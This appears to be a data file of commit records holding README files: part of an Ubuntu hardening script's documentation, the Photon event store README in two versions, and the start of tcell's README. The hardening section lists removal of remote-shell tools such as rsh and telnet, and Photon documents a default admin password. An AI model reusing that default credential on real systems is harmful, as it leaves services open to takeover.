\nUSERADD='\/etc\/default\/useradd'\nUSERCONF='\/etc\/systemd\/user.conf'\n----\n<1> The IP addresses that will be able to connect with SSH, separated by spaces.\n<2> Which group the users have to be member of in order to acess via SSH, separated by spaces.\n<3> Configure SSH port.\n<4> Stricter sysctl settings.\n<5> Auditd failure mode. 0=silent 1=printk 2=panic.\n<6> Auditd rules.\n<7> Logrotate settings.\n<8> NTP server pool.\n<9> Add a specific time zone or use the system default by leaving it empty.\n<10> If you want all the details or not.\n<11> Let the script guess the `FW_ADMIN` and `SSH_GRPS` settings.\n<12> Add something just to verify that you actually glanced the code.\n\n== Functions\n\n=== Function list\n\n==== 01_pre\nSetup script, sets APT flags and permission checks.\n\n==== 02_firewall\nEnable `ufw`, use `\/etc\/sysctl.conf`, and allow port 22 from `$FW_ADMIN`.\n\n==== 03_disablenet\nDisable `dccp` `sctp` `rds` `tipc` protocols.\n\n==== 04_disablemnt\nDisable `cramfs` `freevxfs` `jffs2` `hfs` `hfsplus` `squashfs` `udf` `vfat` file\nsystems.\n\n==== 05_systemdconf\nDisable coredumps and crash shells, set `DefaultLimitNOFILE` and\n`DefaultLimitNPROC` to 1024.\n\n==== 06_journalctl\nCompress logs, forward to syslog and make log storage persistent. Ensure rsyslog\nwrites logs with stricter permissions.\n\n==== 07_timesyncd\nAdd four NTP-servers with a latency < 50ms from `$NTPSERVERPOOL`.\n\n==== 08_fstab\nConfigure `\/tmp\/` and `\/var\/tmp\/`. Remove floppy drivers from `\/etc\/fstab`\nand add `hidepid=2` to `\/proc`.\n\n==== 09_prelink\nUndo prelinking, and remove `prelink` package.\n\n==== 10_aptget\nConfigure `dpkg` and `apt-get`. `apt-get` update and upgrade.\n\n==== 11_hosts\n`\/etc\/hosts.allow` and `\/etc\/hosts.deny` restrictions.\n\n==== 12_logindefs\nModify `\/etc\/login.defs`, e.g. `UMASK`, password age limits and\n`SHA_CRYPT_MAX_ROUNDS`.\n\n==== 13_sysctl\nUpdate `$SYSCTL` with `$SYSCTL_CONF`.\n\n==== 14_limits\nSet hard and soft limits.\n\n==== 15_adduser\nSet `\/bin\/false` as default shell when adding users.\n\n==== 16_rootaccess\nLimit `\/etc\/securetty` to `console`, and `root` from 127.0.0.1 in\n`\/etc\/security\/access.conf`.\n\n==== 17_packages\nInstalls `acct` `aide-common` `apparmor-profiles` `apparmor-utils` `auditd`\n`audispd-plugins` `debsums` `gnupg2` `haveged` `libpam-apparmor`\n`libpam-cracklib` `libpam-tmpdir` `needrestart` `openssh-server` `postfix`\n`rkhunter` `sysstat` `systemd-coredump` `tcpd` `update-notifier-common`\n`vlock`.\n\nRemoves `apport*` `autofs` `avahi*` `beep` `git` `pastebinit`\n`popularity-contest` `rsh*` `rsync` `talk*` `telnet*` `tftp*` `whoopsie`\n`xinetd` `yp-tools` `ypbind`.\n\n==== 18_sshdconfig\nConfigure the `OpenSSH`-daemon.\n\n==== 19_password\nConfigure `pam_cracklib.so` and `pam_tally2.so`.\n\n==== 20_cron\nAllow `root` to use `cron`. Mask `atd`.\n\n==== 21_ctraltdel\nDisable Ctrl-alt-delete.\n\n==== 22_auditd\nConfigure `auditd`, use `$AUDITD_RULES` and set failure mode `$AUDITD_MODE`.\n\n==== 23_disablemod\nDisable `bluetooth` `bnep` `btusb` `cpia2` `firewire-core` `floppy` `n_hdlc`\n`net-pf-31` `pcspkr` `soundcore` `thunderbolt` `usb-midi` `usb-storage`\n`uvcvideo` `v4l2_common` kernel modules.\n\nNote that disabling the `usb-storage` will disable any usage of USB storage\ndevices, if such devices are needed `USBGuard` should be configured accordingly.\n\n==== 24_aide\nConfigure `aide`.\n\n==== 25_rhosts\nRemove `hosts.equiv` and `.rhosts`.\n\n==== 26_users\nRemove `games` `gnats` `irc` `list` `news` `sync` `uucp` users.\n\n==== 27_suid\nRemove `suid` bits from the executables listed in\nlink:misc\/suid.list[this document].\n\n==== 28_umask\nSet `bash` and `\/etc\/profile` umask.\n\n==== 29_apparmor\nEnforce present `apparmor` profiles.\n\n==== 30_path\nSet `root` path to `\/usr\/local\/sbin:\/usr\/local\/bin:\/usr\/sbin:\/usr\/bin:\/sbin:\/bin`,\nand user path to `\/usr\/local\/bin:\/usr\/bin:\/bin`.\n\n==== 31_logindconf\nConfigure `systemd\/logind.conf` and use `KillUserProcesses`.\n\n==== 32_resolvedconf\nConfigure `systemd\/resolved.conf`.\n\n==== 33_rkhunter\nConfigure `rkhunter`.\n\n==== 34_issue\nUpdate `\/etc\/issue` `\/etc\/issue.net` `\/etc\/motd`.\n\n==== 35_apport\nDisable `apport`, `ubuntu-report` and `popularity-contest`.\n\n==== 36_lockroot\nLock the `root` user account.\n\n==== 37_coredump\nDisable coredumps with `systemd\/coredump.conf`.\n\n==== 38_postfix\nDisable the `VRFY` command, configure `smtpd_banner`, `smtpd_client_restrictions`\nand `inet_interfaces`.\n\n==== 39_motdnews\nDisable `motd-news`.\n\n==== 40_usbguard\nInstall and configure `usbguard`.\n\n==== 41_compilers\nRestrict compiler access.\n\n==== 42_kernel\nSet `lockdown=confidentiality` if `\/sys\/kernel\/security\/lockdown` is present.\n\n==== 43_sudo\nConfigure `sudo` `use_pty`, `logfile`, `!visiblepw`, `!pwfeedback` and\n`passwd_timeout`.\n\n==== 98_systemddelta\nIf verbose, show `systemd-delta`.\n\n==== 99_post\nEnsure `secureboot-db` is installed, update grub and ensure strict permissions\non boot files.\n\n==== 99_reboot\nPrint if a reboot is required.\n\n=== Function execution order\n[source,shell]\n----\nf_pre\nf_kernel\nf_firewall\nf_disablenet\nf_disablefs\nf_disablemod\nf_systemdconf\nf_resolvedconf\nf_logindconf\nf_journalctl\nf_timesyncd\nf_fstab\nf_prelink\nf_aptget_configure\nf_aptget\nf_hosts\nf_issue\nf_sudo\nf_logindefs\nf_sysctl\nf_limitsconf\nf_adduser\nf_rootaccess\nf_package_install\nf_coredump\nf_usbguard\nf_postfix\nf_apport\nf_motdnews\nf_rkhunter\nf_sshconfig\nf_sshdconfig\nf_password\nf_cron\nf_ctrlaltdel\nf_auditd\nf_aide\nf_rhosts\nf_users\nf_lockroot\nf_package_remove\nf_suid\nf_restrictcompilers\nf_umask\nf_path\nf_aa_enforce\nf_aide_post\nf_aide_timer\nf_aptget_noexec\nf_aptget_clean\nf_systemddelta\nf_post\nf_checkreboot\n----\n\n== Tests\nThere are approximately 700 https:\/\/github.com\/sstephenson\/bats[Bats tests]\nfor most of the above settings available in the link:tests\/[tests directory].\n\n[source,shell]\n----\nsudo apt-get -y install bats\ngit clone https:\/\/github.com\/konstruktoid\/hardening.git\ncd hardening\/tests\/\nsudo bats .\n----\n\n=== Test automation using Vagrant\nRunning `bash .\/runTests.sh` will use https:\/\/www.vagrantup.com\/[Vagrant] to run\nall above tests and https:\/\/github.com\/CISOfy\/Lynis[Lynis] on all supported Ubuntu\nversions. The script will generate a file named `TESTRESULTS.adoc`.\n\n=== Testing a host\nRunning `bash .\/runHostTests.sh`, located in the link:tests\/[tests directory],\nwill generate a `TESTRESULTS-<HOSTNAME>.adoc` report.\n\n=== OpenSCAP testing\nTo run a https:\/\/github.com\/ComplianceAsCode\/content[OpenSCAP] test on a\nUbuntu host, where `v0.1.49` should be replaced with the latest available\nversion:\n\n[source,shell]\n----\nsudo apt-get -y install libopenscap8 unzip\nwget https:\/\/github.com\/ComplianceAsCode\/content\/releases\/download\/v0.1.49\/scap-security-guide-0.1.49-oval-510.zip\nunzip scap-security-guide-0.1.49-oval-510.zip\ncd scap-security-guide-0.1.49-oval-5.10\noscap info --fetch-remote-resources .\/ssg-ubuntu1804-ds.xml\nsudo oscap xccdf eval --fetch-remote-resources \\\n --profile xccdf_org.ssgproject.content_profile_anssi_np_nt28_high \\\n --report ..\/bionic_stig-report.html .\/ssg-ubuntu1804-ds.xml\n----\n\n== Recommended reading\nhttps:\/\/public.cyber.mil\/stigs\/downloads\/?_dl_facet_stigs=operating-systems%2Cunix-linux[Canonical Ubuntu 18.04 LTS STIG - Ver 1, Rel 1] +\nhttps:\/\/www.cisecurity.org\/benchmark\/distribution_independent_linux\/[CIS Distribution Independent Linux Benchmark] +\nhttps:\/\/www.cisecurity.org\/benchmark\/ubuntu_linux\/[CIS Ubuntu Linux Benchmark] +\nhttps:\/\/www.ncsc.gov.uk\/collection\/end-user-device-security\/platform-specific-guidance\/ubuntu-18-04-lts[EUD Security Guidance: Ubuntu 18.04 LTS]\nhttps:\/\/public.cyber.mil\/stigs\/downloads\/?_dl_facet_stigs=operating-systems%2Cunix-linux[Red Hat Enterprise Linux 7 - Ver 2, Rel 3 STIG] +\nhttps:\/\/wiki.ubuntu.com\/Security\/Features +\nhttps:\/\/help.ubuntu.com\/community\/StricterDefaults +\n\n== Contributing\nDo you want to contribute? That's great! Contributions are always welcome,\nno matter how large or small. If you found something odd, feel free to\nhttps:\/\/github.com\/konstruktoid\/hardening\/issues\/[submit a new issue],\nimprove the code by https:\/\/github.com\/konstruktoid\/hardening\/pulls[creating a pull request],\nor by https:\/\/github.com\/sponsors\/konstruktoid[sponsoring this project].\n\nLogo by https:\/\/github.com\/reallinfo[reallinfo].\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"32c4b62372b460953be75ec2e23894b99d34cd47","subject":"fixes #19","message":"fixes #19","repos":"microserviceux\/photon,microserviceux\/photon,microserviceux\/photon","old_file":"README.adoc","new_file":"README.adoc","new_contents":"# Photon Event Store\n\nPhoton is an event store with cold+hot event streaming.\n\nIn microservices, each service is supposed to take responsibility for a single functional capability: a computational process. In this context, these processes will follow the same pattern: gathering sequences of inputs and generating sequences of outputs though transformation functions, also called projections. Usually such functions are deeply coupled with both 1) the implementation of the service and 2) the data consumed to generate a current state and outputs. As a consequence, designs and implementations of the concepts of storage, sequence handling and data transformation have to be repeated over and over again across different services.\n\nPhoton is an attempt at avoiding such redundancy by abstracting and encapsulating both the storage and the transformation of data as service methods. It is designed as a black box with an internal database with a projection engine, both generic enough to store free-form data and allow for a wide range of expressivity for data transformation, in real time. In this way, business rules can be implemented and deployed in Photon instances via projections, effectively decoupling business logic and data storage and processing.\n\n## Quickstart\n\nDownload the link:https:\/\/github.com\/muoncore\/muon-starter[Muon Starter] repository and run through the instructions and\npre-requisites from there. The latest released version of photon will be started using Docker Compose,\nalong with a contained RabbitMQ instance for communication and other support microservices.\n\nInstall the link:https:\/\/github.com\/muoncore\/muon-cli[Muon CLI] and set up with the URL `amqp:\/\/muon:microservices@localhost`\n\nYou can then see photon running\n\n```bash\n> muon d\n\n\u250c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u252c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u252c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2510\n\u2502 SERVICE NAME \u2502 TAGS \u2502 CONTENT\/TYPE \u2502\n\u251c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u253c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u253c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2524\n\u2502 molecule \u2502 \u2502 application\/json \u2502\n\u251c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u253c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u253c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2524\n\u2502 photon \u2502 photon,eventstore \u2502 application\/json \u2502\n\u2514\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2534\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2534\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2518\n```\n\nYou can emit an event using the CLI\n\n```bash\n> muon event '{ \"event-type\": \"SomethingHappened\", \"schema\": \"1\",\"stream-name\": \"something\",\"payload\": {\"message\": \"Hi there!\"}}'\n```\n\nThis will persist the event in the given stream. It can be replayed at any point later on\n\nYou can replay the persisted events using the CLI\n\n```bash\n\n> muon replay something\n\n```\n\nAll the events stored will then be replayed.\n\n\nCheck the latest http:\/\/muoncore.io\/submodules\/photon\/doc\/index.html[photon documentation] for more information.\n\nCheck the http:\/\/muoncore.io\/guide\/index.html to see patterns for developing with events using Photon\n\n## Developing Photon\n\n### Prerequisites\n\nYou will need [Leiningen][] 2.0.0 or above installed.\n\nhttps:\/\/github.com\/technomancy\/leiningen[leiningen]\n\n### Running\n\nYou can run photon directly from the source:\n\n```\nlein do cljsbuild once, run\n```\n\nOr you can build an uberjar:\n\n```\nlein do cljsbuild once, uberjar\njava -jar photon-*-standalone.jar\n```\n\n### Admin Console\n\nOnce running, point your browser to: `http[s]:\/\/HOST:PORT\/index.html`. HOST and PORT can be configured as seen below.\n\n.Migration of UI\n****\nThis console will be migrated to the Molecule project once the Molecule plugin system is stable.\n****\n\n### Startup options\n\n```\nUsage: java -jar photon-x.x.x-standalone.jar [-h] [-option value] ... [-option value]\nOptions:\n-microservice.name : Service ID, especially important for Muon (default = photon)\n-rest.host : The IP or hostname of the web server for frontend and API. Change it for external access (default = localhost)\n-rest.port : The port for the UI frontend and the REST API\n-rest.keystore : If set, the web server will be started in SSL mode using the certificates identified by this path\n-rest.keypass : The password required to open the keystore set in rest.keystore. Not required in not-SSL mode\n-admin.user : The default username for logging in and requesting API tokens (default = admin)\n-admin.pass : The default password for logging in and requesting API tokens (default = p4010n)\n-admin.secret : A secret string that will be used to encode authentication tokens (default is random on launch)\n-projections.port : Port to stream projection updates to (default = 8375)\n-events.port : Port to stream incoming events to (default = 8376)\n-muon.url : AMQP endpoint for Muon-based transport and discovery (default = amqp:\/\/localhost)\n-parallel.projections : Number of cores assigned for parallel stream processing (default = number of cores on your machine)\n-projections.path : Local folder with projections, in EDN format, to pre-load on start (default = \/tmp\/photon)\n-db.backend : DB backend plugin to use (default=h2). Depending on the build of photon, this can be one of:\n h2, cassandra, redis, file, mongo, riak, dummy.\n-h2.path : If using H2, the file prefix for the database file, including path (default = \/tmp\/photon.h2)\n-cassandra.ip : If using Cassandra, the host of the cluster\n-file.path : If using files as backend, the absolute path to the file\n-mongodb.host : If using MongoDB, the host of the cluster\n-riak.default_bucket : If using Riak, the name of the bucket\n-riak.node.X : If using Riak, the nodes that form the cluster (riak.node.1, riak.node.2, etc.)\n```\n\n### Setting up a file for static configuration\n\nPhoton can be configured either directly from the command line or from a file, and parameters can be combined from different sources. The order of priority in which the configuration is build is the following:\n\n1. Command-line arguments\n2. photon.properties in the working directory\n3. resources\/photon.properties\n4. resources\/config.properties\n\nExample of property file:\n\n```\n# Microservice identifier (default = photon):\nmicroservice.name=photon\n# AMQP endpoint (default = amqp:\/\/localhost):\nmuon.url=amqp:\/\/username:password@localhost\n# Number of cores assigned for parallel stream processing\n# (default = number of cores on your machine):\nparallel.projections=8\n# Local folder with projections, in EDN format, to pre-load on start\n# (default = \/tmp\/photon):\nfile.path=\/path\/to\/edn-files\/\n# DB backend plugin to use, several options currently available:\ndb.backend={file,mongodb,riak,cassandra}\n# Depending on the backend, you'll need to set up the DB plugin:\ncassandra.ip=127.0.0.1\nfile.path=\/path\/to\/file.json\nmongodb.host=localhost\nriak.default_bucket=photon-eventstore-v1\nriak.node.1=riak1.yourdomain.com\nriak.node.2=riak2.yourdomain.com\nriak.node.3=riak3.yourdomain.com\n```\n\n### Muon schemas\n\nThe endpoints and expected schemas to interact with `photon` can be found [here](doc\/schemas.md).\n\n###\u00a0Testing\n\nTests are run by executing\n\n```\nlein midje\n```\n\nTo run the test suite from the REPL:\n\n```bash\nlein repl\n=> (use 'midje.sweet)\n=> (autotest)\n```\n\nAlternatively, create a test photon client to interact with photon:\n\n```bash\nlein new muon-clojure photon-test-client\n```\n\n### Profiling\n\nIn order to achieve the best performance and thoughput, photon has been intensively tested and profiled with the [YourKit](https:\/\/www.yourkit.com) profiler, with a license kindly provided by their creators as part of their support to the open source community.\n\nimage:https:\/\/www.yourkit.com\/images\/yklogo.png[YourKit logo]\n\nYourKit supports open source projects with its full-featured Java Profiler.\nYourKit, LLC is the creator of <a href=\"https:\/\/www.yourkit.com\/java\/profiler\/index.jsp\">YourKit Java Profiler<\/a>\nand <a href=\"https:\/\/www.yourkit.com\/.net\/profiler\/index.jsp\">YourKit .NET Profiler<\/a>,\ninnovative and intelligent tools for profiling Java and .NET applications.\n","old_contents":"# Photon Event Store\n\nPhoton is an event store with cold+hot event streaming.\n\nIn microservices, each service is supposed to take responsibility for a single functional capability: a computational process. In this context, these processes will follow the same pattern: gathering sequences of inputs and generating sequences of outputs though transformation functions, also called projections. Usually such functions are deeply coupled with both 1) the implementation of the service and 2) the data consumed to generate a current state and outputs. As a consequence, designs and implementations of the concepts of storage, sequence handling and data transformation have to be repeated over and over again across different services.\n\nPhoton is an attempt at avoiding such redundancy by abstracting and encapsulating both the storage and the transformation of data as service methods. It is designed as a black box with an internal database with a projection engine, both generic enough to store free-form data and allow for a wide range of expressivity for data transformation, in real time. In this way, business rules can be implemented and deployed in Photon instances via projections, effectively decoupling business logic and data storage and processing.\n\n## Quickstart\n\nDownload the link:https:\/\/github.com\/muoncore\/muon-starter[Muon Starter] repository and run through the instructions and\npre-requisites from there. The latest released version of photon will be started using Docker Compose,\nalong with a contained RabbitMQ instance for communication and other support microservices.\n\nInstall the link:https:\/\/github.com\/muoncore\/muon-cli[Muon CLI] and set up with the URL `amqp:\/\/muon:microservices@localhost`\n\nYou can then see photon running\n\n```bash\n> muon d\n\n\u250c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u252c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u252c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2510\n\u2502 SERVICE NAME \u2502 TAGS \u2502 CONTENT\/TYPE \u2502\n\u251c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u253c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u253c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2524\n\u2502 molecule \u2502 \u2502 application\/json \u2502\n\u251c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u253c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u253c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2524\n\u2502 photon \u2502 photon,eventstore \u2502 application\/json \u2502\n\u2514\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2534\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2534\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2518\n```\n\nYou can emit an event using the CLI\n\n```bash\n> muon event '{ \"event-type\": \"SomethingHappened\", \"schema\": \"1\",\"stream-name\": \"something\",\"payload\": {\"message\": \"Hi there!\"}}'\n```\n\nThis will persist the event in the given stream. It can be replayed at any point later on\n\nYou can replay the persisted events using the CLI\n\n```bash\n\n> muon replay something\n\n```\n\nAll the events stored will then be replayed.\n\n\nCheck the latest http:\/\/muoncore.io\/submodules\/photon\/docs\/index.html[photon documentation] for more information.\n\nCheck the http:\/\/muoncore.io\/guide\/index.html[Muon Guide \"12 Days of Muon\"] to see patterns for developing with events using Photon\n\n## Developing Photon\n\n### Prerequisites\n\nYou will need [Leiningen][] 2.0.0 or above installed.\n\nhttps:\/\/github.com\/technomancy\/leiningen[leiningen]\n\n### Running\n\nYou can run photon directly from the source:\n\n```\nlein do cljsbuild once, run\n```\n\nOr you can build an uberjar:\n\n```\nlein do cljsbuild once, uberjar\njava -jar photon-*-standalone.jar\n```\n\n### Admin Console\n\nOnce running, point your browser to: `http[s]:\/\/HOST:PORT\/index.html`. HOST and PORT can be configured as seen below.\n\n.Migration of UI\n****\nThis console will be migrated to the Molecule project once the Molecule plugin system is stable.\n****\n\n### Startup options\n\n```\nUsage: java -jar photon-x.x.x-standalone.jar [-h] [-option value] ... [-option value]\nOptions:\n-microservice.name : Service ID, especially important for Muon (default = photon)\n-rest.host : The IP or hostname of the web server for frontend and API. Change it for external access (default = localhost)\n-rest.port : The port for the UI frontend and the REST API\n-rest.keystore : If set, the web server will be started in SSL mode using the certificates identified by this path\n-rest.keypass : The password required to open the keystore set in rest.keystore. Not required in not-SSL mode\n-admin.user : The default username for logging in and requesting API tokens (default = admin)\n-admin.pass : The default password for logging in and requesting API tokens (default = p4010n)\n-admin.secret : A secret string that will be used to encode authentication tokens (default is random on launch)\n-projections.port : Port to stream projection updates to (default = 8375)\n-events.port : Port to stream incoming events to (default = 8376)\n-muon.url : AMQP endpoint for Muon-based transport and discovery (default = amqp:\/\/localhost)\n-parallel.projections : Number of cores assigned for parallel stream processing (default = number of cores on your machine)\n-projections.path : Local folder with projections, in EDN format, to pre-load on start (default = \/tmp\/photon)\n-db.backend : DB backend plugin to use (default=h2). Depending on the build of photon, this can be one of:\n h2, cassandra, redis, file, mongo, riak, dummy.\n-h2.path : If using H2, the file prefix for the database file, including path (default = \/tmp\/photon.h2)\n-cassandra.ip : If using Cassandra, the host of the cluster\n-file.path : If using files as backend, the absolute path to the file\n-mongodb.host : If using MongoDB, the host of the cluster\n-riak.default_bucket : If using Riak, the name of the bucket\n-riak.node.X : If using Riak, the nodes that form the cluster (riak.node.1, riak.node.2, etc.)\n```\n\n### Setting up a file for static configuration\n\nPhoton can be configured either directly from the command line or from a file, and parameters can be combined from different sources. The order of priority in which the configuration is build is the following:\n\n1. Command-line arguments\n2. photon.properties in the working directory\n3. resources\/photon.properties\n4. resources\/config.properties\n\nExample of property file:\n\n```\n# Microservice identifier (default = photon):\nmicroservice.name=photon\n# AMQP endpoint (default = amqp:\/\/localhost):\nmuon.url=amqp:\/\/username:password@localhost\n# Number of cores assigned for parallel stream processing\n# (default = number of cores on your machine):\nparallel.projections=8\n# Local folder with projections, in EDN format, to pre-load on start\n# (default = \/tmp\/photon):\nfile.path=\/path\/to\/edn-files\/\n# DB backend plugin to use, several options currently available:\ndb.backend={file,mongodb,riak,cassandra}\n# Depending on the backend, you'll need to set up the DB plugin:\ncassandra.ip=127.0.0.1\nfile.path=\/path\/to\/file.json\nmongodb.host=localhost\nriak.default_bucket=photon-eventstore-v1\nriak.node.1=riak1.yourdomain.com\nriak.node.2=riak2.yourdomain.com\nriak.node.3=riak3.yourdomain.com\n```\n\n### Muon schemas\n\nThe endpoints and expected schemas to interact with `photon` can be found [here](doc\/schemas.md).\n\n###\u00a0Testing\n\nTests are run by executing\n\n```\nlein midje\n```\n\nTo run the test suite from the REPL:\n\n```bash\nlein repl\n=> (use 'midje.sweet)\n=> (autotest)\n```\n\nAlternatively, create a test photon client to interact with photon:\n\n```bash\nlein new muon-clojure photon-test-client\n```\n\n### Profiling\n\nIn order to achieve the best performance and thoughput, photon has been intensively tested and profiled with the [YourKit](https:\/\/www.yourkit.com) profiler, with a license kindly provided by their creators as part of their support to the open source community.\n\nimage:https:\/\/www.yourkit.com\/images\/yklogo.png[YourKit logo]\n\nYourKit supports open source projects with its full-featured Java Profiler.\nYourKit, LLC is the creator of <a href=\"https:\/\/www.yourkit.com\/java\/profiler\/index.jsp\">YourKit Java Profiler<\/a>\nand <a href=\"https:\/\/www.yourkit.com\/.net\/profiler\/index.jsp\">YourKit .NET Profiler<\/a>,\ninnovative and intelligent tools for profiling Java and .NET applications.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"776d98d3850b48f1938592ddf528ba0bae9bccd7","subject":"Add tpong to examples list","message":"Add tpong to examples list","repos":"zyedidia\/tcell,gdamore\/tcell,zyedidia\/tcell,gdamore\/tcell","old_file":"README.adoc","new_file":"README.adoc","new_contents":"= tcell\n\n\nimage:https:\/\/img.shields.io\/travis\/gdamore\/tcell.svg?label=linux[Linux Status,link=\"https:\/\/travis-ci.org\/gdamore\/tcell\"]\nimage:https:\/\/img.shields.io\/appveyor\/ci\/gdamore\/tcell.svg?label=windows[Windows Status,link=\"https:\/\/ci.appveyor.com\/project\/gdamore\/tcell\"]\nimage:https:\/\/img.shields.io\/badge\/license-APACHE2-blue.svg[Apache License,link=\"https:\/\/github.com\/gdamore\/tcell\/blob\/master\/LICENSE\"]\nimage:https:\/\/img.shields.io\/badge\/godoc-reference-blue.svg[GoDoc,link=\"https:\/\/godoc.org\/github.com\/gdamore\/tcell\"]\nimage:http:\/\/goreportcard.com\/badge\/gdamore\/tcell[Go Report Card,link=\"http:\/\/goreportcard.com\/report\/gdamore\/tcell\"]\nimage:https:\/\/img.shields.io\/discord\/639503822733180969?label=discord[Discord,link=\"https:\/\/discord.gg\/urTTxDN\"]\nimage:https:\/\/codecov.io\/gh\/gdamore\/tcell\/branch\/master\/graph\/badge.svg[codecov,link=\"https:\/\/codecov.io\/gh\/gdamore\/tcell\"]\n\n[cols=\"2\",grid=\"none\"]\n|===\n|_Tcell_ is a _Go_ package that provides a cell based view for text terminals, like _xterm_.\nIt was inspired by _termbox_, but includes many additional improvements.\na|[.right]\nimage::logos\/tcell.png[float=\"right\"]\n|===\n\n## Examples\n\n* https:\/\/github.com\/gdamore\/proxima5[proxima5] - space shooter (https:\/\/youtu.be\/jNxKTCmY_bQ[video])\n* https:\/\/github.com\/gdamore\/govisor[govisor] - service management UI (http:\/\/2.bp.blogspot.com\/--OsvnfzSNow\/Vf7aqMw3zXI\/AAAAAAAAARo\/uOMtOvw4Sbg\/s1600\/Screen%2BShot%2B2015-09-20%2Bat%2B9.08.41%2BAM.png[screenshot])\n* mouse demo - included mouse test 